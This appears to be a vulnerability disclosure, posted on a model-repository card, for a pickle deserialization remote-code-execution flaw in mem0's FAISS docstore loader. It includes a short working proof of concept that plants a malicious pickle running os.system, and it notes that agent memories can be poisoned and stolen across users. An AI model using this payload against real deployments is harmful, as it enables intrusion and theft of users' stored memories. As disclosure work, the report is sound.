YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
mem0 β RCE via pickle.load() on FAISS Vector Store Docstore
Vulnerability Type
CWE-502: Deserialization of Untrusted Data
Severity
High β pickle.load() on FAISS docstore file enables RCE if persist directory is writable.
Affected Code
File: mem0/vector_stores/faiss.py
Line: 94
def _load(self, index_path, docstore_path):
try:
self.index = faiss.read_index(index_path)
with open(docstore_path, "rb") as f:
self.docstore, self.index_to_id = pickle.load(f) # β RCE
except Exception as e:
logger.warning(f"Failed to load FAISS index: {e}")
Steps to Reproduce
- Create a mem0 instance with FAISS vector store:
from mem0 import Memory
m = Memory.from_config({"vector_store": {"provider": "faiss", "config": {"path": "/tmp/mem0_test"}}})
m.add("test memory", user_id="user1")
- Replace the docstore pickle file:
import pickle, os
class MemoryPoison:
def __reduce__(self):
return (os.system, ('id > /tmp/mem0_pwned',))
with open("/tmp/mem0_test/docstore.pkl", "wb") as f:
pickle.dump(({"poisoned": MemoryPoison()}, {}), f)
- Restart mem0 or load the index β
_load()callspickle.load()β RCE
AI Impact (10x Multiplier)
mem0 is an AI memory layer used by agents for long-term memory. Compromising it enables:
- Memory poisoning β inject false memories that steer agent behavior
- Data exfiltration β RCE gives access to all stored memories across all users
- Cross-user attacks β in multi-tenant deployments, one user's memory file poisons another
Suggested Fix
import json
with open(docstore_path, "r") as f:
data = json.load(f)
self.docstore = data["docstore"]
self.index_to_id = data["index_to_id"]
Invariant Violated
S16 (DeserializationGuard) + S14 (MemoryInputValidation)
Inference Providers NEW
This model isn't deployed by any Inference Provider. π Ask for provider support